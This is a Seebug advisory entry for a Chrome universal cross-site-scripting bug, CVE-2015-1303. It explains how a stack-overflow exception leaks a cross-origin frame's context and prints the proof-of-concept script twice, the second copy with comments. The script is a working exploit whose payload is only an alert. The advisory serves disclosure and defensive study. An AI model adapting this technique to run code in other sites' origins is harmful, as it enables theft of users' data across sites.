Chrome Universal XSS using stack overflow exceptions (CVE-2015-1303)

2017-04-24T00:00:00
ID SSV:93032
Type seebug
Reporter Root
Modified 2017-04-24T00:00:00

Description

VULNERABILITY DETAILS

When the maximum call stack size is exceeded, a RangeError object is created using the isolate's current context. Thus, if a cross-origin context had been entered (through the V8WrapperInstantiationScope constructor, for example), a cross-origin exception will be propagated to the catch handler.

VERSION

Chrome 45.0.2454.85 (Stable); Chrome 46.0.2490.22 (Beta); Chrome 47.0.2503.0 (Dev); Chromium 47.0.2507.0 (Release build compiled today)

REPRODUCTION CASE

``` <script> var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() { var w = frames[0]; function f() { try { f(); } catch(e) {} try { w.location; } catch(e) { o = e; } } f(); o.constructor.constructor('alert(location)')(); }

function c() { try { frames[0].a; } catch(e) { clearInterval(s); g(); } }

var s = setInterval(c, 1); i.src = 'https://abc.xyz'; </script> ```

                                        
                                            
                                                &lt;script&gt;
// Reproduction case from the advisory above (CVE-2015-1303). Per VULNERABILITY
// DETAILS, a stack-overflow RangeError is allocated in whatever context V8 is
// currently in, so an overflow that happens after a cross-origin frame's
// context has been entered hands that frame's exception object to the
// top document's catch handler. Affected builds are listed under VERSION.
var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() {
  var w = frames[0];
  // Recurses until the call-stack limit is reached. The first try/catch
  // swallows the overflow from the nested call; the following `w.location`
  // access then runs with the stack still almost exhausted, so the exception
  // it raises is presumably the RangeError created in the frame's context
  // rather than the usual same-origin SecurityError — see VULNERABILITY DETAILS.
  function f() {
    try { f(); } catch(e) {}
    try { w.location; } catch(e) { o = e; }
  }
  f();
  // `o` is an implicit global holding the last caught exception. Its
  // constructor chain belongs to the cross-origin frame's realm, which is
  // what makes this a universal XSS: `alert(location)` reports the
  // frame's origin, not the top document's.
  o.constructor.constructor('alert(location)')();
}

function c() {
  // Polls the frame until a property access on it throws, which is expected
  // once the cross-origin navigation started below has committed; then stops
  // the timer and runs the trigger.
  try { frames[0].a; } catch(e) {
    clearInterval(s);
    g();
  }
}

var s = setInterval(c, 1);
// https://abc.xyz is cross-origin to the embedding page, so frames[0]
// becomes inaccessible once it loads.
i.src = 'https://abc.xyz';
&lt;/script&gt;